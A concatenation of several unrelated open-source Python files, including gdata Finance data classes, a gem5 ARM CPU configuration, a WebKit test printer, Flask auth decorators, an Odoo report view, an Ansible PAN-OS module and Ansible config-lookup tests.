import gdata.opensearch.data
GF_TEMPLATE = '{http://schemas.google.com/finance/2007/}%s'
class Commission(atom.core.XmlElement):
"""Commission for the transaction"""
_qname = GF_TEMPLATE % 'commission'
money = [gdata.data.Money]
class CostBasis(atom.core.XmlElement):
"""Cost basis for the portfolio or position"""
_qname = GF_TEMPLATE % 'costBasis'
money = [gdata.data.Money]
class DaysGain(atom.core.XmlElement):
"""Today's gain for the portfolio or position"""
_qname = GF_TEMPLATE % 'daysGain'
money = [gdata.data.Money]
class Gain(atom.core.XmlElement):
"""Total gain for the portfolio or position"""
_qname = GF_TEMPLATE % 'gain'
money = [gdata.data.Money]
class MarketValue(atom.core.XmlElement):
"""Market value for the portfolio or position"""
_qname = GF_TEMPLATE % 'marketValue'
money = [gdata.data.Money]
class PortfolioData(atom.core.XmlElement):
"""Data for the portfolio"""
_qname = GF_TEMPLATE % 'portfolioData'
return_overall = 'returnOverall'
currency_code = 'currencyCode'
return3y = 'return3y'
return4w = 'return4w'
market_value = MarketValue
return_y_t_d = 'returnYTD'
cost_basis = CostBasis
gain_percentage = 'gainPercentage'
days_gain = DaysGain
return3m = 'return3m'
return5y = 'return5y'
return1w = 'return1w'
gain = Gain
return1y = 'return1y'
class PortfolioEntry(gdata.data.GDEntry):
"""Describes an entry in a feed of Finance portfolios"""
portfolio_data = PortfolioData
class PortfolioFeed(gdata.data.GDFeed):
"""Describes a Finance portfolio feed"""
entry = [PortfolioEntry]
class PositionData(atom.core.XmlElement):
"""Data for the position"""
_qname = GF_TEMPLATE % 'positionData'
return_y_t_d = 'returnYTD'
return5y = 'return5y'
return_overall = 'returnOverall'
cost_basis = CostBasis
return3y = 'return3y'
return1y = 'return1y'
return4w = 'return4w'
shares = 'shares'
days_gain = DaysGain
gain_percentage = 'gainPercentage'
market_value = MarketValue
gain = Gain
return3m = 'return3m'
return1w = 'return1w'
class Price(atom.core.XmlElement):
"""Price of the transaction"""
_qname = GF_TEMPLATE % 'price'
money = [gdata.data.Money]
class Symbol(atom.core.XmlElement):
"""Stock symbol for the company"""
_qname = GF_TEMPLATE % 'symbol'
symbol = 'symbol'
exchange = 'exchange'
full_name = 'fullName'
class PositionEntry(gdata.data.GDEntry):
"""Describes an entry in a feed of Finance positions"""
symbol = Symbol
position_data = PositionData
class PositionFeed(gdata.data.GDFeed):
"""Describes a Finance position feed"""
entry = [PositionEntry]
class TransactionData(atom.core.XmlElement):
"""Data for the transction"""
_qname = GF_TEMPLATE % 'transactionData'
shares = 'shares'
notes = 'notes'
date = 'date'
type = 'type'
commission = Commission
price = Price
class TransactionEntry(gdata.data.GDEntry):
"""Describes an entry in a feed of Finance transactions"""
transaction_data = TransactionData
class TransactionFeed(gdata.data.GDFeed):
"""Describes a Finance transaction feed"""
entry = [TransactionEntry]
|
bcheung92/Paperproject | refs/heads/master | gem5/configs/common/O3_ARM_v7a.py | 6 | # Copyright (c) 2012 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ron Dreslinski
from m5.objects import *
# Simple ALU Instructions have a latency of 1
class O3_ARM_v7a_Simple_Int(FUDesc):
opList = [ OpDesc(opClass='IntAlu', opLat=1) ]
count = 2
# Complex ALU instructions have variable latencies
class O3_ARM_v7a_Complex_Int(FUDesc):
opList = [ OpDesc(opClass='IntMult', opLat=3, pipelined=True),
OpDesc(opClass='IntDiv', opLat=12, pipelined=False),
OpDesc(opClass='IprAccess', opLat=3, pipelined=True) ]
count = 1
# Floating point and SIMD instructions
class O3_ARM_v7a_FP(FUDesc):
opList = [ OpDesc(opClass='SimdAdd', opLat=4),
OpDesc(opClass='SimdAddAcc', opLat=4),
OpDesc(opClass='SimdAlu', opLat=4),
OpDesc(opClass='SimdCmp', opLat=4),
OpDesc(opClass='SimdCvt', opLat=3),
OpDesc(opClass='SimdMisc', opLat=3),
OpDesc(opClass='SimdMult',opLat=5),
OpDesc(opClass='SimdMultAcc',opLat=5),
OpDesc(opClass='SimdShift',opLat=3),
OpDesc(opClass='SimdShiftAcc', opLat=3),
OpDesc(opClass='SimdSqrt', opLat=9),
OpDesc(opClass='SimdFloatAdd',opLat=5),
OpDesc(opClass='SimdFloatAlu',opLat=5),
OpDesc(opClass='SimdFloatCmp', opLat=3),
OpDesc(opClass='SimdFloatCvt', opLat=3),
OpDesc(opClass='SimdFloatDiv', opLat=3),
OpDesc(opClass='SimdFloatMisc', opLat=3),
OpDesc(opClass='SimdFloatMult', opLat=3),
OpDesc(opClass='SimdFloatMultAcc',opLat=1),
OpDesc(opClass='SimdFloatSqrt', opLat=9),
OpDesc(opClass='FloatAdd', opLat=5),
OpDesc(opClass='FloatCmp', opLat=5),
OpDesc(opClass='FloatCvt', opLat=5),
OpDesc(opClass='FloatDiv', opLat=9, pipelined=False),
OpDesc(opClass='FloatSqrt', opLat=33, pipelined=False),
OpDesc(opClass='FloatMult', opLat=4) ]
count = 2
# Load/Store Units
class O3_ARM_v7a_Load(FUDesc):
opList = [ OpDesc(opClass='MemRead',opLat=2) ]
count = 1
class O3_ARM_v7a_Store(FUDesc):
opList = [OpDesc(opClass='MemWrite',opLat=2) ]
count = 1
# Functional Units for this CPU
class O3_ARM_v7a_FUP(FUPool):
FUList = [O3_ARM_v7a_Simple_Int(), O3_ARM_v7a_Complex_Int(),
O3_ARM_v7a_Load(), O3_ARM_v7a_Store(), O3_ARM_v7a_FP()]
# Bi-Mode Branch Predictor
class O3_ARM_v7a_BP(BiModeBP):
globalPredictorSize = 8192
globalCtrBits = 2
choicePredictorSize = 8192
choiceCtrBits = 2
BTBEntries = 2048
BTBTagSize = 18
RASSize = 16
instShiftAmt = 2
class O3_ARM_v7a_3(DerivO3CPU):
LQEntries = 16
SQEntries = 16
LSQDepCheckShift = 0
LFSTSize = 1024
SSITSize = 1024
decodeToFetchDelay = 1
renameToFetchDelay = 1
iewToFetchDelay = 1
commitToFetchDelay = 1
renameToDecodeDelay = 1
iewToDecodeDelay = 1
commitToDecodeDelay = 1
iewToRenameDelay = 1
commitToRenameDelay = 1
commitToIEWDelay = 1
fetchWidth = 3
fetchBufferSize = 16
fetchToDecodeDelay = 3
decodeWidth = 3
decodeToRenameDelay = 2
renameWidth = 3
renameToIEWDelay = 1
issueToExecuteDelay = 1
dispatchWidth = 6
issueWidth = 8
wbWidth = 8
fuPool = O3_ARM_v7a_FUP()
iewToCommitDelay = 1
renameToROBDelay = 1
commitWidth = 8
squashWidth = 8
trapLatency = 13
backComSize = 5
forwardComSize = 5
numPhysIntRegs = 128
numPhysFloatRegs = 192
numIQEntries = 32
numROBEntries = 40
switched_out = False
branchPred = O3_ARM_v7a_BP()
# Instruction Cache
class O3_ARM_v7a_ICache(Cache):
hit_latency = 1
response_latency = 1
mshrs = 2
tgts_per_mshr = 8
size = '32kB'
assoc = 2
is_read_only = True
# Writeback clean lines as well
writeback_clean = True
# Data Cache
class O3_ARM_v7a_DCache(Cache):
hit_latency = 2
response_latency = 2
mshrs = 6
tgts_per_mshr = 8
size = '32kB'
assoc = 2
write_buffers = 16
# Consider the L2 a victim cache also for clean lines
writeback_clean = True
# TLB Cache
# Use a cache as a L2 TLB
class O3_ARM_v7aWalkCache(Cache):
hit_latency = 4
response_latency = 4
mshrs = 6
tgts_per_mshr = 8
size = '1kB'
assoc = 8
write_buffers = 16
is_read_only = True
# Writeback clean lines as well
writeback_clean = True
# L2 Cache
class O3_ARM_v7aL2(Cache):
hit_latency = 12
response_latency = 12
mshrs = 16
tgts_per_mshr = 8
size = '1MB'
assoc = 16
write_buffers = 8
prefetch_on_access = True
clusivity = 'mostly_excl'
# Simple stride prefetcher
prefetcher = StridePrefetcher(degree=8, latency = 1)
tags = RandomRepl()
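# Hypothetical wiring sketch (an assumption, not part of this file): a gem5 config
# script would typically instantiate the CPU and attach these caches, e.g. via
# BaseCPU.addPrivateSplitL1Caches:
#
#   cpu = O3_ARM_v7a_3()
#   cpu.addPrivateSplitL1Caches(O3_ARM_v7a_ICache(), O3_ARM_v7a_DCache(),
#                               O3_ARM_v7aWalkCache(), O3_ARM_v7aWalkCache())
#   cpu.createInterruptController()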
|
shinate/phantomjs | refs/heads/master | src/qt/qtwebkit/Tools/Scripts/webkitpy/test/printer.py | 117 | # Copyright (C) 2012 Google, Inc.
# Copyright (C) 2010 Chris Jerdonek ([email protected])
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import StringIO
from webkitpy.common.system.systemhost import SystemHost
from webkitpy.layout_tests.views.metered_stream import MeteredStream
_log = logging.getLogger(__name__)
class Printer(object):
def __init__(self, stream, options=None):
self.stream = stream
self.meter = None
self.options = options
self.num_tests = 0
self.num_started = 0
self.num_errors = 0
self.num_failures = 0
self.running_tests = []
self.completed_tests = []
if options:
self.configure(options)
def configure(self, options):
self.options = options
if options.timing:
# --timing implies --verbose
options.verbose = max(options.verbose, 1)
log_level = logging.INFO
if options.quiet:
log_level = logging.WARNING
elif options.verbose == 2:
log_level = logging.DEBUG
self.meter = MeteredStream(self.stream, (options.verbose == 2),
number_of_columns=SystemHost().platform.terminal_width())
handler = logging.StreamHandler(self.stream)
# We constrain the level on the handler rather than on the root
# logger itself. This is probably better because the handler is
# configured and known only to this module, whereas the root logger
# is an object shared (and potentially modified) by many modules.
# Modifying the handler, then, is less intrusive and less likely to
# interfere with modifications made by other modules (e.g. in unit
# tests).
handler.name = __name__
handler.setLevel(log_level)
formatter = logging.Formatter("%(message)s")
handler.setFormatter(formatter)
logger = logging.getLogger()
logger.addHandler(handler)
logger.setLevel(logging.NOTSET)
# Filter out most webkitpy messages.
#
# Messages can be selectively re-enabled for this script by updating
# this method accordingly.
def filter_records(record):
"""Filter out autoinstall and non-third-party webkitpy messages."""
# FIXME: Figure out a way not to use strings here, for example by
# using syntax like webkitpy.test.__name__. We want to be
# sure not to import any non-Python 2.4 code, though, until
# after the version-checking code has executed.
if (record.name.startswith("webkitpy.common.system.autoinstall") or
record.name.startswith("webkitpy.test")):
return True
if record.name.startswith("webkitpy"):
return False
return True
testing_filter = logging.Filter()
testing_filter.filter = filter_records
# Display a message so developers are not mystified as to why
# logging does not work in the unit tests.
_log.info("Suppressing most webkitpy logging while running unit tests.")
handler.addFilter(testing_filter)
if self.options.pass_through:
# FIXME: Can't import at top of file, as outputcapture needs unittest2
from webkitpy.common.system import outputcapture
outputcapture.OutputCapture.stream_wrapper = _CaptureAndPassThroughStream
def write_update(self, msg):
self.meter.write_update(msg)
def print_started_test(self, source, test_name):
self.running_tests.append(test_name)
if len(self.running_tests) > 1:
suffix = ' (+%d)' % (len(self.running_tests) - 1)
else:
suffix = ''
if self.options.verbose:
write = self.meter.write_update
else:
write = self.meter.write_throttled_update
write(self._test_line(self.running_tests[0], suffix))
def print_finished_test(self, source, test_name, test_time, failures, errors):
write = self.meter.writeln
if failures:
lines = failures[0].splitlines() + ['']
suffix = ' failed:'
self.num_failures += 1
elif errors:
lines = errors[0].splitlines() + ['']
suffix = ' erred:'
self.num_errors += 1
else:
suffix = ' passed'
lines = []
if self.options.verbose:
write = self.meter.writeln
else:
write = self.meter.write_throttled_update
if self.options.timing:
suffix += ' %.4fs' % test_time
self.num_started += 1
if test_name == self.running_tests[0]:
self.completed_tests.insert(0, [test_name, suffix, lines])
else:
self.completed_tests.append([test_name, suffix, lines])
self.running_tests.remove(test_name)
for test_name, msg, lines in self.completed_tests:
if lines:
self.meter.writeln(self._test_line(test_name, msg))
for line in lines:
self.meter.writeln(' ' + line)
else:
write(self._test_line(test_name, msg))
self.completed_tests = []
def _test_line(self, test_name, suffix):
format_string = '[%d/%d] %s%s'
status_line = format_string % (self.num_started, self.num_tests, test_name, suffix)
if len(status_line) > self.meter.number_of_columns():
overflow_columns = len(status_line) - self.meter.number_of_columns()
ellipsis = '...'
if len(test_name) < overflow_columns + len(ellipsis) + 3:
# We don't have enough space even if we elide, just show the test method name.
test_name = test_name.split('.')[-1]
else:
new_length = len(test_name) - overflow_columns - len(ellipsis)
prefix = int(new_length / 2)
test_name = test_name[:prefix] + ellipsis + test_name[-(new_length - prefix):]
return format_string % (self.num_started, self.num_tests, test_name, suffix)
def print_result(self, run_time):
write = self.meter.writeln
write('Ran %d test%s in %.3fs' % (self.num_started, self.num_started != 1 and "s" or "", run_time))
if self.num_failures or self.num_errors:
write('FAILED (failures=%d, errors=%d)\n' % (self.num_failures, self.num_errors))
else:
write('\nOK\n')
class _CaptureAndPassThroughStream(object):
def __init__(self, stream):
self._buffer = StringIO.StringIO()
self._stream = stream
def write(self, msg):
self._stream.write(msg)
# Note that we don't want to capture any output generated by the debugger
# because that could cause the results of capture_output() to be invalid.
if not self._message_is_from_pdb():
self._buffer.write(msg)
def _message_is_from_pdb(self):
# We will assume that if the pdb module is in the stack then the output
# is being generated by the python debugger (or the user calling something
# from inside the debugger).
import inspect
import pdb
stack = inspect.stack()
return any(frame[1] == pdb.__file__.replace('.pyc', '.py') for frame in stack)
def flush(self):
self._stream.flush()
def getvalue(self):
return self._buffer.getvalue()
|
OpenCycleCompass/ocyco-server-python | refs/heads/develop | ocyco/api/decorators.py | 2 | from functools import wraps
from flask import request, jsonify, Response
from sqlalchemy.orm.exc import MultipleResultsFound, NoResultFound
from ocyco.models.users import Users
from ocyco.api.exceptions import MultipleMatchesException
def check_authentication(username, password, superuser=False):
"""This function is called to check if a username /
password combination is valid.
:param username: Username
:param password: Password
:param superuser: additionally check if user is superuser
"""
try:
user = Users.query.filter_by(name=username).one()
if superuser:
return user.verify_password(password) and user.is_superuser()
else:
return user.verify_password(password)
except MultipleResultsFound:
raise MultipleMatchesException('Multiple user with name \'' + username + '\' found.')
except NoResultFound:
return False
def authenticate():
"""Sends a 401 response that enables basic auth"""
# jsonify() already returns a flask Response; configure it directly instead of
# wrapping it in another Response object (which would drop the JSON content type).
response = jsonify({
'status': 'Unauthorized',
'error': 'Please authenticate using HTTP Basic Auth (realm=\'OCYCO\')'
})
response.status_code = 401
response.headers['WWW-Authenticate'] = 'Basic realm="OCYCO"'
return response
def requires_authentication(f):
@wraps(f)
def decorated_function(*args, **kwargs):
auth = request.authorization
if not auth or not check_authentication(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated_function
def requires_superuser(f):
@wraps(f)
def decorated_function(*args, **kwargs):
auth = request.authorization
if not auth or not check_authentication(auth.username, auth.password, True):
return authenticate()
return f(*args, **kwargs)
return decorated_function
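# Hypothetical usage sketch (not part of this module): the decorators above are
# meant to wrap Flask view functions. The route and payload are illustrative only.
#
#   from flask import Flask
#   app = Flask(__name__)
#
#   @app.route('/admin/stats')
#   @requires_superuser
#   def admin_stats():
#       return jsonify({'status': 'ok'})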
|
darkleons/BE | refs/heads/master | addons/hr_evaluation/report/hr_evaluation_report.py | 313 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields, osv
class hr_evaluation_report(osv.Model):
_name = "hr.evaluation.report"
_description = "Evaluations Statistics"
_auto = False
_columns = {
'create_date': fields.datetime('Create Date', readonly=True),
'delay_date': fields.float('Delay to Start', digits=(16, 2), readonly=True),
'overpass_delay': fields.float('Overpassed Deadline', digits=(16, 2), readonly=True),
'deadline': fields.date("Deadline", readonly=True),
'request_id': fields.many2one('survey.user_input', 'Request ID', readonly=True),
'closed': fields.date("Close Date", readonly=True), # TDE FIXME master: rename into date_close
'plan_id': fields.many2one('hr_evaluation.plan', 'Plan', readonly=True),
'employee_id': fields.many2one('hr.employee', "Employee", readonly=True),
'rating': fields.selection([
('0', 'Significantly below expectations'),
('1', 'Did not meet expectations'),
('2', 'Meet expectations'),
('3', 'Exceeds expectations'),
('4', 'Significantly exceeds expectations'),
], "Overall Rating", readonly=True),
'nbr': fields.integer('# of Requests', readonly=True), # TDE FIXME master: rename into nbr_requests
'state': fields.selection([
('draft', 'Draft'),
('wait', 'Plan In Progress'),
('progress', 'Final Validation'),
('done', 'Done'),
('cancel', 'Cancelled'),
], 'Status', readonly=True),
}
_order = 'create_date desc'
_depends = {
'hr.evaluation.interview': ['evaluation_id', 'id', 'request_id'],
'hr_evaluation.evaluation': [
'create_date', 'date', 'date_close', 'employee_id', 'plan_id',
'rating', 'state',
],
}
def init(self, cr):
tools.drop_view_if_exists(cr, 'hr_evaluation_report')
cr.execute("""
create or replace view hr_evaluation_report as (
select
min(l.id) as id,
s.create_date as create_date,
s.employee_id,
l.request_id,
s.plan_id,
s.rating,
s.date as deadline,
s.date_close as closed,
count(l.*) as nbr,
s.state,
avg(extract('epoch' from age(s.create_date,CURRENT_DATE)))/(3600*24) as delay_date,
avg(extract('epoch' from age(s.date,CURRENT_DATE)))/(3600*24) as overpass_delay
from
hr_evaluation_interview l
LEFT JOIN
hr_evaluation_evaluation s on (s.id=l.evaluation_id)
GROUP BY
s.create_date,
s.state,
s.employee_id,
s.date,
s.date_close,
l.request_id,
s.rating,
s.plan_id
)
""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
cryptobanana/ansible | refs/heads/devel | lib/ansible/modules/network/panos/panos_interface.py | 13 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Ansible module to manage PaloAltoNetworks Firewall
# (c) 2016, techbizdev <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: panos_interface
short_description: configure data-port network interface for DHCP
description:
- Configure data-port (DP) network interface for DHCP. By default DP interfaces are static.
author: "Luigi Mori (@jtschichold), Ivan Bojer (@ivanbojer)"
version_added: "2.3"
requirements:
- pan-python can be obtained from PyPi U(https://pypi.python.org/pypi/pan-python)
notes:
- Checkmode is not supported.
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS device being configured.
required: true
username:
description:
- Username credentials to use for auth.
default: "admin"
password:
description:
- Password credentials to use for auth.
required: true
if_name:
description:
- Name of the interface to configure.
required: true
zone_name:
description: >
Name of the zone for the interface. If the zone does not exist it is created.
If the zone already exists but is not of the layer3 type, the operation will fail.
required: true
create_default_route:
description:
- Whether or not to add default route with router learned via DHCP.
default: "false"
commit:
description:
- Commit if changed
default: true
'''
EXAMPLES = '''
- name: enable DHCP client on ethernet1/1 in zone public
interface:
password: "admin"
ip_address: "192.168.1.1"
if_name: "ethernet1/1"
zone_name: "public"
create_default_route: "yes"
'''
RETURN = '''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import get_exception
try:
import pan.xapi
from pan.xapi import PanXapiError
HAS_LIB = True
except ImportError:
HAS_LIB = False
_IF_XPATH = "/config/devices/entry[@name='localhost.localdomain']" +\
"/network/interface/ethernet/entry[@name='%s']"
_ZONE_XPATH = "/config/devices/entry[@name='localhost.localdomain']" +\
"/vsys/entry/zone/entry"
_ZONE_XPATH_QUERY = _ZONE_XPATH + "[network/layer3/member/text()='%s']"
_ZONE_XPATH_IF = _ZONE_XPATH + "[@name='%s']/network/layer3/member[text()='%s']"
_VR_XPATH = "/config/devices/entry[@name='localhost.localdomain']" +\
"/network/virtual-router/entry"
def add_dhcp_if(xapi, if_name, zone_name, create_default_route):
if_xml = [
'<entry name="%s">',
'<layer3>',
'<dhcp-client>',
'<create-default-route>%s</create-default-route>',
'</dhcp-client>'
'</layer3>'
'</entry>'
]
cdr = 'yes'
if not create_default_route:
cdr = 'no'
if_xml = (''.join(if_xml)) % (if_name, cdr)
xapi.edit(xpath=_IF_XPATH % if_name, element=if_xml)
xapi.set(xpath=_ZONE_XPATH + "[@name='%s']/network/layer3" % zone_name,
element='<member>%s</member>' % if_name)
xapi.set(xpath=_VR_XPATH + "[@name='default']/interface",
element='<member>%s</member>' % if_name)
return True
def if_exists(xapi, if_name):
xpath = _IF_XPATH % if_name
xapi.get(xpath=xpath)
network = xapi.element_root.find('.//layer3')
return (network is not None)
def main():
argument_spec = dict(
ip_address=dict(required=True),
password=dict(required=True, no_log=True),
username=dict(default='admin'),
if_name=dict(required=True),
zone_name=dict(required=True),
create_default_route=dict(type='bool', default=False),
commit=dict(type='bool', default=True)
)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False)
if not HAS_LIB:
module.fail_json(msg='pan-python is required for this module')
ip_address = module.params["ip_address"]
password = module.params["password"]
username = module.params['username']
xapi = pan.xapi.PanXapi(
hostname=ip_address,
api_username=username,
api_password=password
)
if_name = module.params['if_name']
zone_name = module.params['zone_name']
create_default_route = module.params['create_default_route']
commit = module.params['commit']
ifexists = if_exists(xapi, if_name)
if ifexists:
module.exit_json(changed=False, msg="interface exists, not changed")
try:
changed = add_dhcp_if(xapi, if_name, zone_name, create_default_route)
except PanXapiError:
exc = get_exception()
module.fail_json(msg=exc.message)
if changed and commit:
xapi.commit(cmd="<commit></commit>", sync=True, interval=1)
module.exit_json(changed=changed, msg="okey dokey")
if __name__ == '__main__':
main()
|
ghjm/ansible | refs/heads/devel | test/units/config/manager/test_find_ini_config_file.py | 35 | # -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import os.path
import stat
import pytest
from ansible.config.manager import find_ini_config_file
from ansible.module_utils._text import to_text
real_exists = os.path.exists
real_isdir = os.path.isdir
working_dir = os.path.dirname(__file__)
cfg_in_cwd = os.path.join(working_dir, 'ansible.cfg')
cfg_dir = os.path.join(working_dir, 'data')
cfg_file = os.path.join(cfg_dir, 'ansible.cfg')
alt_cfg_file = os.path.join(cfg_dir, 'test.cfg')
cfg_in_homedir = os.path.expanduser('~/.ansible.cfg')
@pytest.fixture
def setup_env(request):
cur_config = os.environ.get('ANSIBLE_CONFIG', None)
cfg_path = request.param[0]
if cfg_path is None and cur_config:
del os.environ['ANSIBLE_CONFIG']
else:
os.environ['ANSIBLE_CONFIG'] = request.param[0]
yield
if cur_config is None and cfg_path:
del os.environ['ANSIBLE_CONFIG']
else:
os.environ['ANSIBLE_CONFIG'] = cur_config
@pytest.fixture
def setup_existing_files(request, monkeypatch):
def _os_path_exists(path):
if to_text(path) in (request.param[0]):
return True
else:
return False
def _os_access(path, access):
if to_text(path) in (request.param[0]):
return True
else:
return False
# Enable user and system dirs so that we know cwd takes precedence
monkeypatch.setattr("os.path.exists", _os_path_exists)
monkeypatch.setattr("os.access", _os_access)
monkeypatch.setattr("os.getcwd", lambda: os.path.dirname(cfg_dir))
monkeypatch.setattr("os.path.isdir", lambda path: True if to_text(path) == cfg_dir else real_isdir(path))
class TestFindIniFile:
# This tells us to run twice, once with a file specified and once with a directory
@pytest.mark.parametrize('setup_env, expected', (([alt_cfg_file], alt_cfg_file), ([cfg_dir], cfg_file)), indirect=['setup_env'])
# This just passes the list of files that exist to the fixture
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, alt_cfg_file, cfg_file)]],
indirect=['setup_existing_files'])
def test_env_has_cfg_file(self, setup_env, setup_existing_files, expected):
"""ANSIBLE_CONFIG is specified, use it"""
warnings = set()
assert find_ini_config_file(warnings) == expected
assert warnings == set()
@pytest.mark.parametrize('setup_env', ([alt_cfg_file], [cfg_dir]), indirect=['setup_env'])
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd)]],
indirect=['setup_existing_files'])
def test_env_has_no_cfg_file(self, setup_env, setup_existing_files):
"""ANSIBLE_CONFIG is specified but the file does not exist"""
warnings = set()
# since the cfg file specified by ANSIBLE_CONFIG doesn't exist, the one at cwd that does
# exist should be returned
assert find_ini_config_file(warnings) == cfg_in_cwd
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# All config files are present
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_in_cwd, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_ini_in_cwd(self, setup_env, setup_existing_files):
"""ANSIBLE_CONFIG not specified. Use the cwd cfg"""
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_cwd
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# No config in cwd
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_ini_in_homedir(self, setup_env, setup_existing_files):
"""First config found is in the homedir"""
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_homedir
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# No config in cwd
@pytest.mark.parametrize('setup_existing_files', [[('/etc/ansible/ansible.cfg', cfg_file, alt_cfg_file)]], indirect=['setup_existing_files'])
def test_ini_in_systemdir(self, setup_env, setup_existing_files):
"""First config found is the system config"""
warnings = set()
assert find_ini_config_file(warnings) == '/etc/ansible/ansible.cfg'
assert warnings == set()
# ANSIBLE_CONFIG not specified
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# No config in cwd
@pytest.mark.parametrize('setup_existing_files',
[[('/etc/ansible/ansible.cfg', cfg_in_homedir, cfg_file, alt_cfg_file)]],
indirect=['setup_existing_files'])
def test_cwd_does_not_exist(self, setup_env, setup_existing_files, monkeypatch):
"""Smoketest current working directory doesn't exist"""
def _os_stat(path):
raise OSError('%s does not exist' % path)
monkeypatch.setattr('os.stat', _os_stat)
warnings = set()
assert find_ini_config_file(warnings) == cfg_in_homedir
assert warnings == set()
@pytest.mark.parametrize('setup_env', [[None]], indirect=['setup_env'])
# No config in cwd
@pytest.mark.parametrize('setup_existing_files', [[list()]], indirect=['setup_existing_files'])
def test_no_config(self, setup_env, setup_existing_files):
"""No config present, no config found"""
warnings = set()
assert find_ini_config_file(warnings) is None
